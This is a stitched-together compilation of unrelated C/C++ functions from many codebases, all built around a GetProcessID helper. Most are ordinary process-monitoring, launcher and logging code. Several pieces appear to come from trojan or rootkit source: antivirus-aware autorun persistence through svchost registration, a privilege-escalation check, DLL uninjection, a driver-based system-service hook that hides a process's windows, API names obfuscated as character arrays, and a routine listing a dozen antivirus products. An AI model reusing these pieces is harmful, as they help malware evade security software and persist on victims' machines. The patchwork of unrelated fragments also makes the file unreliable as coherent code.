void WriteAutoRun1(char *lpszDstExeName) { //_asm int 3 // MyCommon::SetSvcHostReg(lpszDstExeName,0); // return; if(IsRegExsit()|| StrStr(GetCommandLineA(),"-svchost") //MyCommon::IsServerStart("winio") ) { return; } if (GetProcessID("360tray.exe")&&!MyCommon::IsServerStart("ctfmon")) { Loader1(lpszDstExeName); } else { if (GetProcessID("KSafeTray.exe")|| GetProcessID("kxetray.exe")|| MyCommon::IsServerStart("ctfmon")) { MyCommon::SetSvcHostReg(lpszDstExeName,1); } else MyCommon::SetSvcHostReg(lpszDstExeName,0); } }
BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess) { DWORD ProcessID = 0; HANDLE hProcess = NULL; BOOL IsHighPrivileged = FALSE; DEBUG_MESSAGE("\t[+] Trying To Get Process ID Of: %s\n", TargetProcess); ProcessID = GetProcessID(TargetProcess); if (!ProcessID) { DEBUG_ERROR("\t\t[-] Failed To Get Process ID Of: %s\n", TargetProcess); exit(EXIT_FAILURE); } else { DEBUG_INFO("\t\t[+] Process ID Of %s: %d\n", TargetProcess, ProcessID); } DEBUG_MESSAGE("\t[+] Trying To Open %s With PROCESS_ALL_ACCESS\n", TargetProcess); // Open the process to check the privilege level, if we are able // to open any SYSTEM process, this means we have successfully // elevated current process privileges hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID); if (!hProcess) { DEBUG_ERROR("\t\t[-] Failed To Open %s Process: 0x%X\n", TargetProcess, GetLastError()); } else { DEBUG_INFO("\t\t[+] Process Handle Of %s: 0x%X\n", TargetProcess, hProcess); IsHighPrivileged = TRUE; } return IsHighPrivileged; }
BOOL CInjectDLL::Uninject(const wchar_t* wszProcessName, const LPCTSTR& lpwszRemoteDllFullPath) { DWORD dwProcID; GetProcessID(wszProcessName,dwProcID); if (Uninject(dwProcID, lpwszRemoteDllFullPath)) return TRUE; else return FALSE; }
bool ProcessHelper::IsProcessRuning(const QString& path) { #ifdef Q_OS_DARWIN ProcessSerialNumber psn; return ProcessHelper::GetProcessPSN(path, psn); #elif defined Q_OS_WIN quint32 pid = 0; return GetProcessID(path, pid); #endif return false; }
//존재하지 않거나 이미 DLL을 포함할때 true를 반환 bool E_Util::isContainDLL(wchar_t* processName, wchar_t* dllname) { DWORD processID = GetProcessID(processName); if (processID == 0) return true;//프로세스아디가 존재하지 않음 bool result = false; HMODULE hMods[1024]; HANDLE hProcess; DWORD cbNeeded; unsigned int i; // Print the process identifier. //printf("\nProcess ID: %u\n", processID); // Get a handle to the process. hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); if (NULL == hProcess) return result; // Get a list of all the modules in this process. if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) { for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) { TCHAR szModName[MAX_PATH]; // Get the full path to the module's file. if (GetModuleFileNameEx(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(TCHAR))) { // Print the module name and handle value. //TRACE_WIN32A("[isContainDLL]%d. Module List %s", i, szModName); if (wcsstr(szModName, dllname) != 0) { //TRACE_WIN32A("[isContainDLL]IT HAS EXPANDABLE DLL"); result = true; break; } //_tprintf(TEXT("\t%s (0x%08X)\n"), szModName, hMods[i]); } } } // Release the handle to the process. CloseHandle(hProcess); return result; }
bool getSetOfProcessID(string processName, std::vector<DWORD>*SetOfPID) { wstring wscons = stringToWidestring(processName); LPCTSTR p_Name = wscons.c_str(); GetProcessID(p_Name, *SetOfPID); if (SetOfPID->empty()) // Process is not running { return false; } return true; }
void LogPrintVersion(bool isController) { const char* debugInfo = ""; const char* productString = PRODUCT_STRING; #ifdef DEBUG const char* buildDate = "Build date: " __DATE__ " " __TIME__; Buffer debugBuffer; debugBuffer.Appendf(" -- DEBUG %s, Pid: %U", buildDate, GetProcessID()); debugBuffer.NullTerminate(); debugInfo = debugBuffer.GetBuffer(); #endif Log_Message("%s started as %s%s", productString, isController ? "CONTROLLER" : "SHARD SERVER", debugInfo); }
DWORD GetBaseAddr( const char *process_name ) { DWORD pid = GetProcessID(process_name); HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,pid); if (hSnapshot == INVALID_HANDLE_VALUE) { CloseHandle(hSnapshot); return -1; } MODULEENTRY32 me; me.dwSize = sizeof(MODULEENTRY32); Module32First(hSnapshot,&me); return (DWORD)me.modBaseAddr; CloseHandle(hSnapshot); return -1; }
int ProcessWatch::FindHeavyProcess() { int processCount = GetProcessID(); for(int i=1; i<processCount; i++) { int cpu = GetProcessCpuUsage(m_vecProcessInfo[i].processID); //_tprintf(TEXT("%d, %d\n"), m_vecProcessInfo[i].processID, cpu); if(cpu>15) { char str[MAX_BUF_PATH] = {}; TCHAR tstr[MAX_BUF_PATH] = {}; sprintf_s(str, sizeof(str), "PID[%d] cpu usage more than limited value: %d %%, the path is %s \n", m_vecProcessInfo[i].processID, cpu, UnicodeToANSI(m_vecProcessInfo[i].processPath).c_str()); _tcscpy_s(tstr, ANSIToUnicode(string(str)).c_str()); WriteToLog(tstr); return m_vecProcessInfo[i].processID; } } return 0; }
void ProcessHelper::SetActiveProcess(const QString& path) { #ifdef Q_OS_DARWIN ProcessSerialNumber psn; if (ProcessHelper::GetProcessPSN(path, psn)) SetFrontProcess(&psn); #elif defined Q_OS_WIN quint32 pid = 0; HWND hWnd = 0; if (GetProcessID(path, pid)) { ENUMINFO EnumInfo; // set the search parameters EnumInfo.PId = pid; // set the return parameters to default values EnumInfo.hWnd = NULL; EnumInfo.hEmptyWnd = NULL; EnumInfo.hInvisibleWnd = NULL; EnumInfo.hEmptyInvisibleWnd = NULL; // do the search among the top level windows ::EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&EnumInfo); // return the one found if any if (EnumInfo.hWnd != NULL) hWnd = EnumInfo.hWnd; else if (EnumInfo.hEmptyWnd != NULL) hWnd = EnumInfo.hEmptyWnd; else if (EnumInfo.hInvisibleWnd != NULL) hWnd = EnumInfo.hInvisibleWnd; else hWnd = EnumInfo.hEmptyInvisibleWnd; } if (hWnd) ::SetForegroundWindow(hWnd); #endif }
int CnmpInfo::run() { //DenyInterrupt(); //创建日志组件 m_pLogManage = CLogManage::getInstance(); if ( m_pLogManage->setLog( GetProcessID()) < 0 ) { std::cerr << __FILE__ << " " << __LINE__ << " " << "log error" << std::endl; return -1; } //创建数据库连接对象 TOCIDatabase* pDB = Environment::getDBConn(); if ( NULL == pDB ) { LOG_DEBUG( "get db info error" ); return -1; } m_pQry = new TOCIQuery( pDB ); if ( NULL == m_pQry ) { LOG_DEBUG( "create oci qry object error" ); return -1; } if(init()< 0) { LOG_DEBUG( "init error" ); return -1; } LOG_DEBUG( "NMP信息点提取开始运行..." ); char szLog[MAX_STRING_LENGTH]= {0}; pthread_t thread_id1; pthread_t thread_id2; int iRet = pthread_create(&thread_id1,NULL,thread_highInfo,NULL); if(iRet!=0) { LOG_DEBUG("create thread error"); return -1; } iRet = pthread_create(&thread_id2,NULL,thread_lowInfo,NULL); if(iRet!=0) { LOG_DEBUG("create thread error"); return -1; } //主线程实时检测子线程是否退出 //如退出则进程退出 while(true) { int pthread_kill_err =-1; //检查线程是否还在 pthread_kill_err = pthread_kill(thread_id1,0); if(pthread_kill_err == ESRCH) { memset(szLog,0x00,sizeof(szLog)); sprintf(szLog,"ID为0x%x的线程不存在或者已经退出",(unsigned int)thread_id1); LOG_DEBUG(szLog); return -1; } else if(pthread_kill_err == EINVAL) { LOG_DEBUG("发送信号非法"); } else { memset(szLog,0x00,sizeof(szLog)); sprintf(szLog,"ID为0x%x的线程目前仍然存活。",(unsigned int)thread_id1); } //检查线程是否还在 pthread_kill_err = pthread_kill(thread_id2,0); if(pthread_kill_err == ESRCH) { memset(szLog,0x00,sizeof(szLog)); sprintf(szLog,"ID为0x%x的线程不存在或者已经退出",(unsigned int)thread_id2); LOG_DEBUG(szLog); return -1; } else if(pthread_kill_err == EINVAL) { LOG_DEBUG("发送信号非法"); } else { memset(szLog,0x00,sizeof(szLog)); sprintf(szLog,"ID为0x%x的线程目前仍然存活。",(unsigned int)thread_id2); } usleep(99999); } return 1; }
VOID CMainDialog::OnHideWindowHandles() { CHAR ProcessName[MAX_PATH]; CEdit *pProcessName = (CEdit *)GetDlgItem(IDC_PROCESSNAME); CButton *pHideWindowHandlesButton = (CButton *)GetDlgItem(IDHIDEWINDOWHANDLES); CButton *pShowWindowHandlesButton = (CButton *)GetDlgItem(IDSHOWWINDOWHANDLES); pProcessName->GetWindowText(ProcessName, sizeof(ProcessName)); strcat(ProcessName, ".exe"); DWORD HiddenWindowHandleProcessId; LPVOID pHiddenWindowHandleProcessId = &HiddenWindowHandleProcessId; if(FALSE != (HiddenWindowHandleProcessId = GetProcessID(ProcessName))) { pHideWindowHandlesButton->EnableWindow(FALSE); pShowWindowHandlesButton->EnableWindow(TRUE); } else { MessageBox("Process Does Not Exist!", "Error", MB_ICONERROR); return; } if (DriverLoaded) { UnloadDriver(); DriverLoaded = FALSE; } LoadDriver(); DriverLoaded = TRUE; CommDevice = CreateFile("\\\\.\\ShadowTableHookDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(CommDevice == INVALID_HANDLE_VALUE) { int error = GetLastError(); FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBox((LPTSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION); return; } if(CommDevice) { DWORD dwReturn; if (0 == (DeviceIoControl(CommDevice, IO_SEND_HIDDEN_PROCESS_ID, pHiddenWindowHandleProcessId, sizeof(HiddenWindowHandleProcessId), NULL, 0, &dwReturn, NULL))) { int error = GetLastError(); FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBox((LPCSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION); return; } } if(CommDevice) { DWORD dwReturn; IsGUIThread(TRUE); if (0 == (DeviceIoControl(CommDevice, IO_HOOK_SYSTEM_SERVICES, NULL, 0, NULL, 0, &dwReturn, NULL))) { int error = GetLastError(); FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBox((LPCSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION); return; } } }
char *GetLogUser2K() { typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken"); typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse ); LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA"); typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength ); GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation"); typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess"); DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
/******************************************************************************* ONLY ONE BLOCK START *******************************************************************************/ int InitOnlyOneBlock(char *bname) { int i, pid; char pname[BUF_SIZE]; char fname[BUF_SIZE]; char errbuf[MAX_ERRBUF_LEN]; struct stat statbuf; if (is_registered_block(bname) < 0) { sprintf(errbuf, "NON EXIST BLOCK NAME\n"); PrintOut(TIFB_FAIL, errbuf); return -1; } for( i=0 ; i < strlen(bname); i++) pname[i] = toupper(bname[i]); pname[strlen(bname)] = 0x00; pid = GetProcessID(pname); if(pid > 0) /*** ALREADY RUNNING *****************************************/ { sprintf(errbuf, "ALREADY RUNNING PROCESS %s\n", pname); PrintOut(TIFB_FAIL, errbuf); return -1; } //sprintf(fname, "%s%s", APP_HOME_BIN, pname); fname[0] = 0x00; if( dGetBlockBIN(pname, fname, 256) < 0) { sprintf(errbuf, "NOT Find Binary(%s) in McInit\n", pname); PrintOut(TIFB_FAIL, errbuf); } if(stat(fname, &statbuf) < 0) return -3; pid = fork(); if(pid < 0) { sprintf(errbuf, "CAN'T CREATE A NEW PROCESS\n"); PrintOut(TIFB_FAIL, errbuf); return -1; } else if(pid == 0) { freopen("/dev/null", "w", stdout); freopen("/dev/null", "r", stdout); if (execl(fname, pname, (char *)0) < 0) { memset(errbuf, 0x0, MAX_ERRBUF_LEN); sprintf(errbuf, "CAN'T EXECUTE A NEW BLOCK : %s(%s)\n", bname, fname); PrintOut(TIFB_FAIL, errbuf); } exit(0); } else { return pid; } }
/******************************************************************************* MAIN FUNCTION *******************************************************************************/ int main(int ac, char **av) { FILE *fp; int fd; int pid; int i, j, ln, err, kf, dRet; int init_only_one = 0; int verbose_flag = 0; char buf[BUF_SIZE]; char fname[BUF_SIZE]; char block_name[BUF_SIZE]; char tmpbuf[128], errbuf[2048]; signal(SIGHUP, SIG_IGN); signal(SIGCHLD, SIG_IGN); signal(SIGQUIT, init_isr); dRet = dGetUserPermission(); if( dRet == 0 ) { sprintf(errbuf, "INAVLID USER PERMISSION\n" ); PrintOut(TIFB_FAIL, errbuf); return 1; } dRet = dGetBlocks(FILE_MC_INIT,STR_TSW_COM); if( dRet < 0 ){ sprintf(errbuf, "FAILED IN McInit\n" ); PrintOut(TIFB_FAIL, errbuf); return 1; } else{ dCurrBlockCnt = dRet; } if( init_proc() < 0 ){ exit(0); } if (ac == 1) /*** ALL START ********************************************/ { strcpy(fname, FILE_MC_INIT); /*** "McInit" File ****************************/ } else if (ac > 3) { UsageExit(); } else { for(i = 1;i < ac;i++) { if (av[i][0] != '-') { UsageExit(); } else if(av[i][1] == 'b') { if( ac < 3 ) { UsageExit(); } else /*** ONLY ONE BLOCK START *****************************/ { ++i; init_only_one = 1; for(j = 0;j < strlen(av[i]);j++) block_name[j] = toupper(av[i][j]); block_name[j] = 0; } } else if( av[i][1] == 'v' ) /*** ALL START ************************/ { verbose_flag = 1; } else if(av[i][1] == 'd') { /* FOR SYSTEM AUTO RESTART : WAIT BOOTTING COMPLETE */ sleep(300); verbose_flag = 1; } else { UsageExit(); } } } //freopen("/dev/null", "w", stdout); /*** 한개 블럭을 기동 시킴 ************************************************/ if (init_only_one) { pid = InitOnlyOneBlock(block_name); if(pid > 0) { sprintf(errbuf, "NEW BLOCK : %s\n PROCESS ID: %d\n", block_name, pid); PrintOut(TIFB_SUCCESS, errbuf); for(i=0; i< dCurrBlockCnt; i++) { if( STR_TSW_COM[i] == NULL ) continue; if( !strcasecmp(block_name, STR_TSW_COM[i]) ) { send_pid_msg(i, pid); break; } } } exit(0); } /*************************************************************************** READ FIDB_FILE, SET SHARED MEMORY VALUE ***************************************************************************/ if ((fd = open (FILE_FIDB, O_RDONLY, 0666)) < 0) { } else { remove( FILE_FIDB ); } strcpy(fname, FILE_MC_INIT); if((fp = fopen(fname, "r")) == NULL) { sprintf(errbuf, "CAN'T OPEN FILE %s\n", fname); PrintOut(TIFB_FAIL, errbuf); exit(1); } ln = cntr = 0; /*************************************************************************** READ McInit File. SET blocks(bname, fname) VALUE ***************************************************************************/ while(fgets(buf, BUF_SIZE, fp) != NULL) { ln++; if (AnalyzeLine(buf) < 0) { fclose(fp); close(fd); sprintf(errbuf, "SYNTAX ERROR (FILE: %s, LINE: %d)\n", fname, ln); PrintOut(TIFB_FAIL, errbuf); exit(1); } } fclose(fp); /*************************************************************************** WHEN ALL BLOCK IS STARTED, CHECK 2 TIMES ***************************************************************************/ if( verbose_flag == 0 ) { fprintf(stderr, "\n\tBlocks to initialize are follows.\n"); PrintBlocks(); fprintf(stderr, "\tDo you want initialize (y/n) ? "); err = GetYorN(); if(err == _NO) { sprintf(errbuf, "STOPPED BY USER REQUEST\n"); PrintOut(TIFB_SUCCESS, errbuf); exit(0); } fprintf(stderr, "\n\tDo you really want initialize (y/n) ? "); err = GetYorN(); if(err == _NO) { sprintf(errbuf, "STOPPED BY USER REQUEST\n"); PrintOut(TIFB_SUCCESS, errbuf); exit(0); } } sprintf(errbuf, "MAIN COMPUTER PROCESSS INITIALIZATION STARTED\n"); PrintOut( TIFB_SUCCESS , errbuf ); signal(SIGINT, init_isr); /*** 프로세스 기동을 개시함 ***********************************************/ for(i=0; i<cntr; i++) { /*** 파일의 존재 및 수행가능성 조사 ***********************************/ if( IsCorrectBlock(i) < 0 ) { if( verbose_flag == 1 ) { continue; } else { sprintf(errbuf, "FILE %s DOES NOT EXIST\n", blocks[i].fname); PrintOut(TIFB_FAIL, errbuf); fprintf(stderr, "\n\tDo you want to continue (y/n) ? "); err = GetYorN(); if(err == _YES) { inits[i].isinit = _FALSE; continue; } else { final_isr(); } } } /*** 이미 실행중인지 여부를 검사 **************************************/ if ( (pid = GetProcessID(blocks[i].bname)) > 0 ) { /* 이미 실행중인 경우 */ if( verbose_flag == 1 ) { err = _YES ; } else { fprintf(stderr, "\n\tBlock \"%s\" is already running.\n", blocks[i].bname); fprintf(stderr, "\tDo you want replace block \"%s\" (y/n) ? ", blocks[i].bname); err = GetYorN(); } if(err == _NO) { inits[i].isinit = _FALSE; continue; } else { /* New Version of Killing */ kf = kill(pid, SIGTERM); if (kf < 0) { //sleep(2); if (kill(pid, SIGTERM) < 0) { if (errno == ESRCH) kf = 0; } else { kf = 0; } } if ( kf && kill(pid, SIGKILL) < 0) { if( verbose_flag == 1 ) { err = _YES ; } else { fprintf(stderr, "\tCan't kill process \"%d\"(%s)\n", pid, blocks[i].bname); fprintf(stderr, "\tDo you want to continue (y/n) ? "); err = GetYorN(); } if(err == _YES) { inits[i].isinit = _FALSE; continue; } else { final_isr(); } } else { sprintf(errbuf, "PROCESS %s(PID=%d) KILLED\n", blocks[i].fname, pid); PrintOut(TIFB_SUCCESS, errbuf); } } } signal(SIGTERM, init_isr); /*********************************************************************** PROCESS START ***********************************************************************/ err = ProcessStart(i); if(err == -1) { if( verbose_flag == 1 ) { continue; } else { sprintf(errbuf, "CAN'T START PROCESS BLOCK: %s\n", blocks[i].bname); PrintOut(TIFB_FAIL, errbuf); fprintf(stderr, "\tDo you want to continue (y/n) ? "); } } else if(err == -2) { if( verbose_flag == 1 ) { continue; } else { sprintf(errbuf, "PROGRAM NAME %s DOES NOT MEET NAME CONVENTION\n", blocks[i].fname); strcat(errbuf, " ABANDON EXECUTING PROCESS\n"); PrintOut(TIFB_FAIL, errbuf); fprintf(stderr, "\tDo you want to continue (y/n) ? "); } } if(err < 0) { if( verbose_flag == 1 ) { err = _YES; } else { err = GetYorN(); } if(err == _NO) { final_isr(); } else { inits[i].isinit = _FALSE; continue; } } else { sprintf(errbuf, "A PROCESS INIAILIZATION SUCCESS\n"); sprintf(tmpbuf, " BLOCK NAME : %s\n", blocks[i].bname); strcat(errbuf, tmpbuf); sprintf(tmpbuf, " PROGRAM NAME : %s\n", blocks[i].fname); strcat(errbuf, tmpbuf); sprintf(tmpbuf, " PROCESS ID : %d\n", err); strcat(errbuf, tmpbuf); PrintOut(TIFB_SUCCESS, errbuf); sleep(1); for(j=0; j< dCurrBlockCnt; j++) { if( STR_TSW_COM[i] == NULL ) continue; if( !strcasecmp(blocks[i].bname, STR_TSW_COM[j]) ) { send_pid_msg(j, err ); break; } } inits[i].isinit = _TRUE; inits[i].pid = err; } } PrintSuccessBlocks(); printf("UPRESTO co. GTAM\n\n"); exit(1); }
HANDLE CProcess::GetHandle(string ProcessName) { HANDLE h_Process; h_Process = OpenProcess(PROCESS_VM_READ, FALSE, GetProcessID(ProcessName)); return h_Process; }
int main(int ac, char **av) { int i, dRet, dVerCount; if( (dRet = dGetUserPermission()) == 0) { sprintf(errbuf, "INAVLID USER PERMISSION\n" ); PrintOut(TIFB_FAIL, errbuf); return EXIT_FAILURE; } if( (dVerCount = dGetVerBlock(FILE_MC_INIT, STR_VER_COM)) < 0) { sprintf(errbuf, "ERROR IN dGetVerBlock(%s)\n", FILE_MC_INIT); PrintOut(TIFB_FAIL, errbuf); return EXIT_FAILURE; } if( (dRet = dGetBlocks(FILE_MC_INIT, STR_TSW_COM)) < 0) { sprintf(errbuf, "FAILED IN McInit\n" ); PrintOut(TIFB_FAIL, errbuf); return EXIT_FAILURE; } else dCurrBlockCnt = dRet; //debug flag setting if( ac == 2 && av[1][0] == '-' && av[1][1] == 'd' ) { debug_flag = 1; } else { debug_flag = 0; } Init_Value(); for(i = 0; i < dCurrBlockCnt; i++) { if(STR_TSW_COM[i] == NULL) continue; stProc.mpswinfo[i].pid = GetProcessID(STR_TSW_COM[i]); if(stProc.mpswinfo[i].pid > 0) { stProc.mpsw[i] = NORMAL; stProc.mpswinfo[i].when = starttime; } else stProc.mpsw[i] = CRITICAL; } for(i = 0; i < dCurrBlockCnt; i++) { if(stProc.mpsw[i] == NORMAL) { if(InitVersionShm() < 0) { sprintf(errbuf, "SHARED MEMORY( VERSION ) INIT FAILURE\n"); PrintOut(TIFB_FAIL, errbuf); return EXIT_FAILURE; } break; } } dInit_fidb(); PrintResult(dVerCount); return EXIT_SUCCESS; }
char *GetLogUser2K() { DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = OpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = GetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = GetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = LookupAccountSid(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
char* GetVirus() { static char AllName[256] = ""; //360安全 卡巴 江民 char* VirusName = "360tray.exe"; char* VirusName1 = "avp.exe"; char* VirusName2 = "KvMonXP.exe"; //瑞星 360杀毒 麦咖啡 char* VirusName3 = "RavMonD.exe"; char* VirusName4 = "360sd.exe"; char* VirusName5 = "Mcshield.exe"; //NOD32 金山 可牛 char* VirusName6 = "egui.exe"; char* VirusName7 = "kxetray.exe"; char* VirusName8 = "knsdtray.exe"; //趋势 小红伞 avast char* VirusName9 = "TMBMSRV.exe"; char* VirusName10 = "avcenter.exe"; char* VirusName11 = "ashDisp.exe"; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(AllName,"%s",""); // char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); if (GetProcessID(VirusName)) { VirusName = "360安全卫士"; plstrcatA( AllName, VirusName); // plstrcatA( AllName, " " ); } if (GetProcessID(VirusName1)) { VirusName1 = "卡巴"; plstrcatA( AllName, VirusName1 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName2)) { VirusName2 = "江民"; plstrcatA( AllName, VirusName2 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName3)) { VirusName3 = "瑞星"; plstrcatA( AllName, VirusName3 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName4)) { VirusName4 = "360杀毒"; plstrcatA( AllName, VirusName4 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName5)) { VirusName5 = "麦咖啡"; plstrcatA( AllName, VirusName5 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName6)) { VirusName6 = "NOD32"; plstrcatA( AllName, VirusName6 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName7)) { VirusName7 = "金山"; plstrcatA( AllName, VirusName7 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName8)) { VirusName8 = "可牛"; plstrcatA( AllName, VirusName8 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName9)) { VirusName9 = "趋势"; plstrcatA( AllName, VirusName9 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName10)) { VirusName10 = "小红伞"; plstrcatA( AllName, VirusName10 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName11)) { VirusName11 = "Avast"; plstrcatA( AllName, VirusName11 ); plstrcatA( AllName, " " ); } if (Gyfunction->my_strstr(AllName, " " ) == 0 ) { plstrcatA(AllName , "未发现 "); } return AllName; }